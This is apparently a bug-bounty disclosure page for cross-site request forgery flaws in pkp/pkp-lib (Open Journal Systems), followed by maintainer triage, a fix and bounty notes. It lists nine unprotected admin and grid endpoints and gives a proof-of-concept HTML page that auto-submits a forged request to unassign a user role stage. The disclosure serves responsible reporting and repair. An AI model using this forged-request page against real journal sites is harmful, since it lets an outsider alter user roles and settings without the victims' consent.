Cross-Site Request Forgery (CSRF) in pkp/pkp-lib

Valid

Reported on

Oct 5th 2021

Description

Missing CSRF token in role stage assignment, save language settings, and task notification

1: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5

2: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/roles/user-group-grid/assign-stage?stageId=1&userGroupId=5

3: http://10.0.2.15/index.php/e/$$$call$$$/grid/settings/languages/manage-language-grid/save-language-setting?rowId=en_US&setting=supportedLocales&value=

4: http://10.0.2.15/index.php/index/admin/clearDataCache

5: http://10.0.2.15/index.php/index/admin/clearTemplateCache

6: http://10.0.2.15/index.php/index/admin/clearScheduledTaskLogFiles

7: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-read?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

8: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/mark-new?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

9: http://10.0.2.15/index.php/e/$$$call$$$/grid/notifications/task-notifications-grid/delete?grid-notifications-tasknotificationsgridPage=1&grid-notifications-tasknotificationsgridItemsPerPage=25

Proof of Concept

Example: Unassign stage

Open the index.html:

<html>                                                                                                             
  <body>                                                                                                           
        <form action="http://[OJS-IP+PORT]/ojs/index.php/[JOURNAL_NAME]/$$$call$$$/grid/settings/roles/user-group-grid/unassign-stage?stageId=1&userGroupId=5" method="POST"> 
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html>

Impact

This vulnerability is capable of changing user role stage assignments and changing language settings for forms

Occurrences

missing csrf validation for language settings

missing csrf validation for clear scheduled task

missing validation of csrf in mark read

Missing csrf tokens for the 3 admin control actions

missing csrf token in assign / unassign stage form

missing csrf validation for clear data cache

missing validation of csrf in mark new

missing validation of csrf in delete

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
haxatron modified the report
a year ago
haxatron
a year ago

Researcher

Hi @admin, maintainers have updated SECURITY.md at https://github.com/pkp/ojs/blob/main/SECURITY.md

Jamie Slome
a year ago

Admin

I have left a comment on the GitHub Issue.

Alec Smecher validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher
a year ago

Maintainer

I have filed this at https://github.com/pkp/pkp-lib/issues/7371 and will work on a fix. I'm not familiar with this website's model and left the bounty amount selection at its default.

haxatron
a year ago

Researcher

Thanks for validating this report!

Alec Smecher marked this as fixed with commit 62c07e a year ago
Alec Smecher has been awarded the fix bounty
This vulnerability will not receive a CVE
userGroupForm.tpl#L11-L65 has been validated
index.tpl#L35-L37 has been validated
to join this conversation